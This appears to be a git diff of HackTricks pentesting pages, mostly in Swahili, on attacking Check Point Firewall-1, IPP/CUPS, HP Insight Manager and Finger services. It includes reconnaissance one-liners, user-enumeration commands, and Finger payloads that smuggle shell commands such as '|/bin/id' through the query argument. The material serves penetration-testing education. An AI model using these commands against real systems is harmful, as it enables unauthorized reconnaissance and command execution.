<summary><strong>Jifunze kuhusu kudukua AWS kutoka sifuri hadi shujaa na</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (Mtaalam wa Timu Nyekundu ya AWS ya HackTricks)</strong></a><strong>!</strong></summary>
<summary>Support HackTricks</summary>
Njia nyingine za kusaidia HackTricks:
* Ikiwa unataka kuona **kampuni yako inatangazwa kwenye HackTricks** au **kupakua HackTricks kwa muundo wa PDF** Angalia [**MPANGO WA KUJIUNGA**](https://github.com/sponsors/carlospolop)!
* Pata [**swag rasmi wa PEASS & HackTricks**](https://peass.creator-spring.com)
* Gundua [**Familia ya PEASS**](https://opensea.io/collection/the-peass-family), mkusanyiko wetu wa [**NFTs**](https://opensea.io/collection/the-peass-family) ya kipekee
* **Jiunge na** 💬 [**Kikundi cha Discord**](https://discord.gg/hRep4RUj7f) au [**kikundi cha telegram**](https://t.me/peass) au **tufuate** kwenye **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
* **Shiriki mbinu zako za kudukua kwa kuwasilisha PR kwa** [**HackTricks**](https://github.com/carlospolop/hacktricks) na [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
* Angalia [**mpango wa usajili**](https://github.com/sponsors/carlospolop)!
* **Jiunge na** 💬 [**kikundi cha Discord**](https://discord.gg/hRep4RUj7f) au [**kikundi cha telegram**](https://t.me/peass) au **fuata** sisi kwenye **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
* **Shiriki mbinu za hacking kwa kuwasilisha PRs kwa** [**HackTricks**](https://github.com/carlospolop/hacktricks) na [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) repos za github.
</details>
{% endhint %}

50
network-services-pentesting/pentesting-264-check-point-firewall-1.md
View file

@ -1,28 +1,31 @@
{% hint style="success" %}
Learn & practice AWS Hacking:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
Learn & practice GCP Hacking: <img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
<details>
<summary><strong>Jifunze kuhusu kudukua AWS kutoka sifuri hadi shujaa na</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (Mtaalam wa Timu Nyekundu ya AWS ya HackTricks)</strong></a><strong>!</strong></summary>
<summary>Support HackTricks</summary>
Njia nyingine za kusaidia HackTricks:
* Ikiwa unataka kuona **kampuni yako inatangazwa kwenye HackTricks** au **kupakua HackTricks kwa PDF** Angalia [**MPANGO WA KUJIUNGA**](https://github.com/sponsors/carlospolop)!
* Pata [**swag rasmi ya PEASS & HackTricks**](https://peass.creator-spring.com)
* Gundua [**Familia ya PEASS**](https://opensea.io/collection/the-peass-family), mkusanyiko wetu wa kipekee wa [**NFTs**](https://opensea.io/collection/the-peass-family)
* **Jiunge na** 💬 [**Kikundi cha Discord**](https://discord.gg/hRep4RUj7f) au [**kikundi cha telegram**](https://t.me/peass) au **tufuate** kwenye **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
* **Shiriki mbinu zako za kudukua kwa kuwasilisha PRs kwa** [**HackTricks**](https://github.com/carlospolop/hacktricks) na [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) repos za github.
* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
</details>
{% endhint %}
Inawezekana kuingiliana na firewall za **CheckPoint** **Firewall-1** ili kupata habari muhimu kama jina la firewall na jina la kituo cha usimamizi. Hii inaweza kufanywa kwa kutuma ombi kwenye bandari **264/TCP**.
Inawezekana kuingiliana na **CheckPoint** **Firewall-1** firewalls ili kugundua taarifa muhimu kama vile jina la firewall na jina la kituo cha usimamizi. Hii inaweza kufanywa kwa kutuma ombi kwa bandari **264/TCP**.
### Kupata Majina ya Firewall na Kituo cha Usimamizi
Kwa kutumia ombi la kabla ya uthibitishaji, unaweza kutekeleza moduli inayolenga **CheckPoint Firewall-1**. Amri muhimu kwa operesheni hii zimefafanuliwa hapa chini:
Kwa kutumia ombi la kabla ya uthibitisho, unaweza kutekeleza moduli inayolenga **CheckPoint Firewall-1**. Amri zinazohitajika kwa operesheni hii zimeelezwa hapa chini:
```bash
use auxiliary/gather/checkpoint_hostname
set RHOST 10.10.10.10
```
Baada ya kutekelezwa, moduli inajaribu kuwasiliana na huduma ya Topolojia ya SecuRemote ya firewall. Ikiwa mafanikio, inathibitisha uwepo wa Firewall ya CheckPoint na kupata majina ya firewall na mwenyeji wa usimamizi wa SmartCenter. Hapa kuna mfano wa jinsi matokeo yanavyoweza kuonekana:
Upon execution, the module attempts to contact the firewall's SecuRemote Topology service. If successful, it confirms the presence of a CheckPoint Firewall and retrieves the names of both the firewall and the SmartCenter management host. Here's an example of what the output might look like:
Kwa utekelezaji, moduli inajaribu kuwasiliana na huduma ya SecuRemote Topology ya firewall. Ikiwa inafanikiwa, inathibitisha uwepo wa CheckPoint Firewall na inapata majina ya firewall na mwenyeji wa usimamizi wa SmartCenter. Hapa kuna mfano wa jinsi matokeo yanaweza kuonekana:
```text
[*] Attempting to contact Checkpoint FW1 SecuRemote Topology service...
[+] Appears to be a CheckPoint Firewall...
@ -30,33 +33,34 @@ Baada ya kutekelezwa, moduli inajaribu kuwasiliana na huduma ya Topolojia ya Sec
[+] SmartCenter Host: FIREFIGHTER-MGMT.example.com
[*] Auxiliary module execution completed
```
### Njia Mbadala ya Kugundua Jina la Hostname na ICA
### Njia Mbadala ya Kugundua Jina la Kikoa na Jina la ICA
Tekniki nyingine inahusisha amri moja moja ambayo inatuma ombi maalum kwa firewall na kuchambua majibu ili kuchukua jina la hostname na ICA la firewall. Amri na muundo wake ni kama ifuatavyo:
Mbinu nyingine inahusisha amri ya moja kwa moja inayotuma swali maalum kwa firewall na kuchambua jibu ili kupata jina la kikoa la firewall na jina la ICA. Amri na muundo wake ni kama ifuatavyo:
```bash
printf '\x51\x00\x00\x00\x00\x00\x00\x21\x00\x00\x00\x0bsecuremote\x00' | nc -q 1 10.10.10.10 264 | grep -a CN | cut -c 2-
```
Matokeo kutoka amri hii hutoa taarifa za kina kuhusu jina la cheti (CN) na shirika (O) la firewall, kama inavyoonyeshwa hapa chini:
Matokeo kutoka kwa amri hii yanatoa taarifa za kina kuhusu jina la cheti la firewall (CN) na shirika (O), kama inavyoonyeshwa hapa chini:
```text
CN=Panama,O=MGMTT.srv.rxfrmi
```
## Marejeo
## References
* [https://supportcenter.checkpoint.com/supportcenter/portal?eventSubmit\_doGoviewsolutiondetails=&solutionid=sk69360](https://supportcenter.checkpoint.com/supportcenter/portal?eventSubmit_doGoviewsolutiondetails=&solutionid=sk69360)
* [https://bitvijays.github.io/LFF-IPS-P2-VulnerabilityAnalysis.html\#check-point-firewall-1-topology-port-264](https://bitvijays.github.io/LFF-IPS-P2-VulnerabilityAnalysis.html#check-point-firewall-1-topology-port-264)
{% hint style="success" %}
Jifunze & fanya mazoezi ya AWS Hacking:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
Jifunze & fanya mazoezi ya GCP Hacking: <img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
<details>
<summary><strong>Jifunze kuhusu kudukua AWS kutoka sifuri hadi shujaa na</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
<summary>Support HackTricks</summary>
Njia nyingine za kusaidia HackTricks:
* Ikiwa unataka kuona **kampuni yako ikitangazwa kwenye HackTricks** au **kupakua HackTricks kwa muundo wa PDF** Angalia [**MPANGO WA KUJIUNGA**](https://github.com/sponsors/carlospolop)!
* Pata [**swag rasmi ya PEASS & HackTricks**](https://peass.creator-spring.com)
* Gundua [**The PEASS Family**](https://opensea.io/collection/the-peass-family), mkusanyiko wetu wa [**NFTs**](https://opensea.io/collection/the-peass-family) za kipekee
* **Jiunge na** 💬 [**Kikundi cha Discord**](https://discord.gg/hRep4RUj7f) au [**kikundi cha telegram**](https://t.me/peass) au **tufuate** kwenye **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
* **Shiriki mbinu zako za kudukua kwa kuwasilisha PRs kwenye** [**HackTricks**](https://github.com/carlospolop/hacktricks) na [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
* Angalia [**mpango wa usajili**](https://github.com/sponsors/carlospolop)!
* **Jiunge na** 💬 [**kikundi cha Discord**](https://discord.gg/hRep4RUj7f) au [**kikundi cha telegram**](https://t.me/peass) au **tufuatilie** kwenye **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
* **Shiriki hila za hacking kwa kuwasilisha PRs kwa** [**HackTricks**](https://github.com/carlospolop/hacktricks) na [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) repos za github.
</details>
{% endhint %}

44
network-services-pentesting/pentesting-631-internet-printing-protocol-ipp.md
View file

@ -1,25 +1,26 @@
{% hint style="success" %}
Learn & practice AWS Hacking:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
Learn & practice GCP Hacking: <img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
<details>
<summary><strong>Jifunze kuhusu kudukua AWS kutoka sifuri hadi shujaa na</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (Mtaalam wa Timu Nyekundu ya AWS ya HackTricks)</strong></a><strong>!</strong></summary>
<summary>Support HackTricks</summary>
Njia nyingine za kusaidia HackTricks:
* Ikiwa unataka kuona **kampuni yako inatangazwa kwenye HackTricks** au **kupakua HackTricks kwa PDF** Angalia [**MPANGO WA KUJIUNGA**](https://github.com/sponsors/carlospolop)!
* Pata [**swag rasmi ya PEASS & HackTricks**](https://peass.creator-spring.com)
* Gundua [**Familia ya PEASS**](https://opensea.io/collection/the-peass-family), mkusanyiko wetu wa kipekee wa [**NFTs**](https://opensea.io/collection/the-peass-family)
* **Jiunge na** 💬 [**Kikundi cha Discord**](https://discord.gg/hRep4RUj7f) au [**kikundi cha telegram**](https://t.me/peass) au **tufuate** kwenye **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
* **Shiriki mbinu zako za kudukua kwa kuwasilisha PRs kwenye** [**HackTricks**](https://github.com/carlospolop/hacktricks) na [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) repos za github.
* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
</details>
{% endhint %}
# Itifaki ya Uchapishaji ya Mtandao \(IPP\)
# Internet Printing Protocol \(IPP\)
**Itifaki ya Uchapishaji ya Mtandao (IPP)**, kama ilivyoelezwa katika **RFC2910** na **RFC2911**, inatumika kama msingi wa uchapishaji kupitia mtandao. Uwezo wake wa kupanuliwa unadhihirishwa na maendeleo kama **IPP Kila Mahali**, ambayo inalenga kusawazisha uchapishaji wa simu na wa wingu, na uanzishwaji wa nyongeza kwa **uchapishaji wa 3D**.
**Internet Printing Protocol (IPP)**, kama ilivyoainishwa katika **RFC2910** na **RFC2911**, inatumika kama msingi wa uchapishaji kupitia mtandao. Uwezo wake wa kupanuliwa unaonyeshwa na maendeleo kama **IPP Everywhere**, ambayo inalenga kuimarisha uchapishaji wa simu na wingu, na utambulisho wa nyongeza za **uchapishaji wa 3D**.
Kwa kutumia itifaki ya **HTTP**, IPP inanufaika na mazoea ya usalama yaliyowekwa ikiwa ni pamoja na **uthibitishaji wa msingi/digest** na **ufichamishi wa SSL/TLS**. Vitendo kama vile kuwasilisha kazi ya uchapishaji au kuuliza hali ya printer hufanywa kupitia **ombi za POST za HTTP** zilizoelekezwa kwa seva ya IPP, ambayo inafanya kazi kwenye **bandari 631/tcp**.
Kwa kutumia protokali ya **HTTP**, IPP inafaidika na mbinu za usalama zilizowekwa ikiwa ni pamoja na **uthibitishaji wa msingi/digest** na **SSL/TLS encryption**. Vitendo kama kuwasilisha kazi ya uchapishaji au kuuliza hali ya printer vinafanywa kupitia **HTTP POST requests** zinazolengwa kwenye seva ya IPP, ambayo inafanya kazi kwenye **port 631/tcp**.
Utekelezaji maarufu wa IPP ni **CUPS**, mfumo wa uchapishaji wa chanzo wazi unaotumiwa sana kwenye usambazaji tofauti za Linux na OS X. Ingawa ni muhimu, IPP, kama LPD, inaweza kutumiwa vibaya kuhamisha maudhui yanayoweza kuwa na nia mbaya kupitia faili za **PostScript** au **PJL**, ikionyesha hatari ya usalama inayowezekana.
Utekelezaji maarufu wa IPP ni **CUPS**, mfumo wa uchapishaji wa chanzo wazi unaojulikana katika usambazaji mbalimbali za Linux na OS X. Licha ya matumizi yake, IPP, kama LPD, inaweza kutumika vibaya kuhamasisha maudhui mabaya kupitia **PostScript** au **PJL files**, ikionyesha hatari ya usalama inayoweza kutokea.
```python
# Example of sending an IPP request using Python
import requests
@ -31,20 +32,19 @@ data = b"..." # IPP request data goes here
response = requests.post(url, headers=headers, data=data, verify=True)
print(response.status_code)
```
Ikiwa unataka kujifunza zaidi kuhusu [**kudukua printa soma ukurasa huu**](http://hacking-printers.net/wiki/index.php/Main_Page).
Ikiwa unataka kujifunza zaidi kuhusu [**kuvamia printers soma ukurasa huu**](http://hacking-printers.net/wiki/index.php/Main_Page).
{% hint style="success" %}
Jifunze & fanya mazoezi ya AWS Hacking:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
Jifunze & fanya mazoezi ya GCP Hacking: <img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
<details>
<summary><strong>Jifunze kudukua AWS kutoka sifuri hadi shujaa na</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (Mtaalam wa Timu Nyekundu ya AWS ya HackTricks)</strong></a><strong>!</strong></summary>
<summary>Support HackTricks</summary>
Njia nyingine za kusaidia HackTricks:
* Ikiwa unataka kuona **kampuni yako ikionekana kwenye HackTricks** au **kupakua HackTricks kwa PDF** Angalia [**MPANGO WA KUJIUNGA**](https://github.com/sponsors/carlospolop)!
* Pata [**swag rasmi ya PEASS & HackTricks**](https://peass.creator-spring.com)
* Gundua [**The PEASS Family**](https://opensea.io/collection/the-peass-family), mkusanyiko wetu wa [**NFTs**](https://opensea.io/collection/the-peass-family) ya kipekee
* **Jiunge na** 💬 [**Kikundi cha Discord**](https://discord.gg/hRep4RUj7f) au [**kikundi cha telegram**](https://t.me/peass) au **tufuate** kwenye **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
* **Shiriki mbinu zako za kudukua kwa kuwasilisha PRs kwenye** [**HackTricks**](https://github.com/carlospolop/hacktricks) na [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) repos za github.
* Angalia [**mpango wa usajili**](https://github.com/sponsors/carlospolop)!
* **Jiunge na** 💬 [**kikundi cha Discord**](https://discord.gg/hRep4RUj7f) au [**kikundi cha telegram**](https://t.me/peass) au **tufuatilie** kwenye **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
* **Shiriki mbinu za uvamizi kwa kuwasilisha PRs kwa** [**HackTricks**](https://github.com/carlospolop/hacktricks) na [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) repos za github.
</details>
{% endhint %}

40
network-services-pentesting/pentesting-compaq-hp-insight-manager.md
View file

@ -1,25 +1,26 @@
{% hint style="success" %}
Learn & practice AWS Hacking:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
Learn & practice GCP Hacking: <img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
<details>
<summary><strong>Jifunze kuhusu kuhack AWS kutoka sifuri hadi shujaa na</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (Mtaalam wa Timu Nyekundu ya AWS ya HackTricks)</strong></a><strong>!</strong></summary>
<summary>Support HackTricks</summary>
Njia nyingine za kusaidia HackTricks:
* Ikiwa unataka kuona **kampuni yako inatangazwa kwenye HackTricks** au **kupakua HackTricks kwa PDF** Angalia [**MPANGO WA KUJIUNGA**](https://github.com/sponsors/carlospolop)!
* Pata [**swag rasmi ya PEASS & HackTricks**](https://peass.creator-spring.com)
* Gundua [**The PEASS Family**](https://opensea.io/collection/the-peass-family), mkusanyiko wetu wa kipekee wa [**NFTs**](https://opensea.io/collection/the-peass-family)
* **Jiunge na** 💬 [**Kikundi cha Discord**](https://discord.gg/hRep4RUj7f) au [**kikundi cha telegram**](https://t.me/peass) au **tufuate** kwenye **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
* **Shiriki mbinu zako za kuhack kwa kuwasilisha PRs kwenye** [**HackTricks**](https://github.com/carlospolop/hacktricks) na [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) repos za github.
* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
</details>
{% endhint %}
**Bandari ya Chaguo:** 2301,2381
**Default Port:** 2301,2381
# **Nywila za Chaguo**
# **Default passwords**
{% embed url="http://www.vulnerabilityassessment.co.uk/passwordsC.htm" %}
# Faili za Usanidi
# Faili za Config
```text
path.properties
mx.log
@ -29,16 +30,17 @@ pg_hba.conf
jboss-service.xml
.namazurc
```
{% hint style="success" %}
Jifunze na fanya mazoezi ya AWS Hacking:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
Jifunze na fanya mazoezi ya GCP Hacking: <img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
<details>
<summary><strong>Jifunze kuhusu kudukua AWS kutoka sifuri hadi shujaa na</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (Mtaalam wa Timu Nyekundu ya AWS ya HackTricks)</strong></a><strong>!</strong></summary>
<summary>Support HackTricks</summary>
Njia nyingine za kusaidia HackTricks:
* Ikiwa unataka kuona **kampuni yako ikionekana kwenye HackTricks** au **kupakua HackTricks kwa muundo wa PDF** Angalia [**MPANGO WA KUJIUNGA**](https://github.com/sponsors/carlospolop)!
* Pata [**swag rasmi ya PEASS & HackTricks**](https://peass.creator-spring.com)
* Gundua [**The PEASS Family**](https://opensea.io/collection/the-peass-family), mkusanyiko wetu wa [**NFTs**](https://opensea.io/collection/the-peass-family) ya kipekee
* **Jiunge na** 💬 [**Kikundi cha Discord**](https://discord.gg/hRep4RUj7f) au [**kikundi cha telegram**](https://t.me/peass) au **tufuate** kwenye **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
* **Shiriki mbinu zako za kudukua kwa kuwasilisha PRs kwenye** [**HackTricks**](https://github.com/carlospolop/hacktricks) na [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) repos za github.
* Angalia [**mpango wa usajili**](https://github.com/sponsors/carlospolop)!
* **Jiunge na** 💬 [**kikundi cha Discord**](https://discord.gg/hRep4RUj7f) au [**kikundi cha telegram**](https://t.me/peass) au **fuata** sisi kwenye **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
* **Shiriki mbinu za hacking kwa kuwasilisha PRs kwa** [**HackTricks**](https://github.com/carlospolop/hacktricks) na [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) repos za github.
</details>
{% endhint %}

60
network-services-pentesting/pentesting-finger.md
View file

@ -1,50 +1,51 @@
# 79 - Kupima Kidole
# 79 - Pentesting Finger
{% hint style="success" %}
Learn & practice AWS Hacking:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
Learn & practice GCP Hacking: <img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
<details>
<summary><strong>Jifunze kuhusu kudukua AWS kutoka sifuri hadi shujaa na</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (Mtaalam wa Timu Nyekundu ya AWS ya HackTricks)</strong></a><strong>!</strong></summary>
<summary>Support HackTricks</summary>
Njia nyingine za kusaidia HackTricks:
* Ikiwa unataka kuona **kampuni yako inatangazwa kwenye HackTricks** au **kupakua HackTricks kwa muundo wa PDF** Angalia [**MPANGO WA KUJIUNGA**](https://github.com/sponsors/carlospolop)!
* Pata [**swag rasmi ya PEASS & HackTricks**](https://peass.creator-spring.com)
* Gundua [**Familia ya PEASS**](https://opensea.io/collection/the-peass-family), mkusanyiko wetu wa [**NFTs**](https://opensea.io/collection/the-peass-family) ya kipekee
* **Jiunge na** 💬 [**Kikundi cha Discord**](https://discord.gg/hRep4RUj7f) au [**kikundi cha telegram**](https://t.me/peass) au **tufuate** kwenye **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
* **Shiriki mbinu zako za kudukua kwa kuwasilisha PR kwa** [**HackTricks**](https://github.com/carlospolop/hacktricks) na [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) repos za github.
* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
</details>
{% endhint %}
## **Maelezo Muhimu**
## **Basic Info**
Programu/Huduma ya **Kidole** hutumiwa kupata maelezo kuhusu watumiaji wa kompyuta. Kawaida, maelezo yanayotolewa ni pamoja na **jina la kuingia la mtumiaji, jina kamili**, na, katika baadhi ya kesi, maelezo ya ziada. Maelezo haya ya ziada yanaweza kujumuisha eneo la ofisi na nambari ya simu (ikiwa inapatikana), wakati mtumiaji alijiunga, kipindi cha kutokuwa na shughuli (muda wa kutokuwa na shughuli), wakati wa mwisho mtumiaji alisoma barua pepe, na maudhui ya faili za mpango na mradi wa mtumiaji.
Programu/huduma ya **Finger** inatumika kwa kupata maelezo kuhusu watumiaji wa kompyuta. Kawaida, taarifa zinazotolewa zinajumuisha **jina la kuingia la mtumiaji, jina kamili**, na, katika baadhi ya matukio, maelezo ya ziada. Maelezo haya ya ziada yanaweza kujumuisha eneo la ofisi na nambari ya simu (ikiwa inapatikana), wakati mtumiaji alipoingia, kipindi cha kutokuwa na shughuli (wakati wa kupumzika), tukio la mwisho ambapo barua pepe ilisomwa na mtumiaji, na maudhui ya mipango na faili za mradi za mtumiaji.
**Bandari ya chaguo-msingi:** 79
**Default port:** 79
```
PORT STATE SERVICE
79/tcp open finger
```
## **Uchambuzi**
## **Uhesabu**
### **Kukamata Bango/Unganisho Msingi**
### **Kuchukua Bango/Kuunganisha Msingi**
```bash
nc -vn <IP> 79
echo "root" | nc -vn <IP> 79
```
### **Uthibitishaji wa Watumiaji**
### **Uainishaji wa watumiaji**
```bash
finger @<Victim> #List users
finger admin@<Victim> #Get info of user
finger user@<Victim> #Get info of user
```
Badala yake, unaweza kutumia **finger-user-enum** kutoka [**pentestmonkey**](http://pentestmonkey.net/tools/user-enumeration/finger-user-enum), baadhi ya mifano:
Mbadala unaweza kutumia **finger-user-enum** kutoka [**pentestmonkey**](http://pentestmonkey.net/tools/user-enumeration/finger-user-enum), baadhi ya mifano:
```bash
finger-user-enum.pl -U users.txt -t 10.0.0.1
finger-user-enum.pl -u root -t 10.0.0.1
finger-user-enum.pl -U users.txt -T ips.txt
```
#### **Nmap inatekeleza script kwa kutumia script za msingi**
#### **Nmap tekeleza script kwa kutumia scripts za default**
### Metasploit hutumia mbinu zaidi kuliko Nmap
### Metasploit inatumia hila zaidi kuliko Nmap
```
use auxiliary/scanner/finger/finger_users
```
@ -52,28 +53,29 @@ use auxiliary/scanner/finger/finger_users
* `port:79 USER`
## Utekelezaji wa Amri
## Utekelezaji wa amri
```bash
finger "|/bin/id@example.com"
finger "|/bin/ls -a /@example.com"
```
## Kupiga Kidole
## Finger Bounce
[Tumia mfumo kama kituo cha kupiga kidole](https://securiteam.com/exploits/2BUQ2RFQ0I/)
[Tumia mfumo kama relay ya finger](https://securiteam.com/exploits/2BUQ2RFQ0I/)
```
finger user@host@victim
finger @internal@external
```
{% hint style="success" %}
Jifunze na fanya mazoezi ya AWS Hacking:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
Jifunze na fanya mazoezi ya GCP Hacking: <img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
<details>
<summary><strong>Jifunze kuhusu kudukua AWS kutoka sifuri hadi shujaa na</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (Mtaalam wa Timu Nyekundu ya AWS ya HackTricks)</strong></a><strong>!</strong></summary>
<summary>Support HackTricks</summary>
Njia nyingine za kusaidia HackTricks:
* Ikiwa unataka kuona **kampuni yako ikionekana kwenye HackTricks** au **kupakua HackTricks kwa muundo wa PDF** Angalia [**MPANGO WA KUJIUNGA**](https://github.com/sponsors/carlospolop)!
* Pata [**swag rasmi ya PEASS & HackTricks**](https://peass.creator-spring.com)
* Gundua [**The PEASS Family**](https://opensea.io/collection/the-peass-family), mkusanyiko wetu wa [**NFTs**](https://opensea.io/collection/the-peass-family) ya kipekee
* **Jiunge na** 💬 [**Kikundi cha Discord**](https://discord.gg/hRep4RUj7f) au [**kikundi cha telegram**](https://t.me/peass) au **tufuate** kwenye **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
* **Shiriki mbinu zako za kudukua kwa kuwasilisha PRs kwenye** [**HackTricks**](https://github.com/carlospolop/hacktricks) na [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) repos za github.
* Angalia [**mpango wa usajili**](https://github.com/sponsors/carlospolop)!
* **Jiunge na** 💬 [**kikundi cha Discord**](https://discord.gg/hRep4RUj7f) au [**kikundi cha telegram**](https://t.me/peass) au **tufuatilie** kwenye **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
* **Shiriki mbinu za hacking kwa kuwasilisha PRs kwa** [**HackTricks**](https://github.com/carlospolop/hacktricks) na [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) repos za github.
</details>
{% endhint %}

82
network-services-pentesting/pentesting-jdwp-java-debug-wire-protocol.md
View file

@ -1,60 +1,63 @@
# Pentesting JDWP - Itifaki ya Uunganishaji wa Java Debug Wire
# Pentesting JDWP - Java Debug Wire Protocol
{% hint style="success" %}
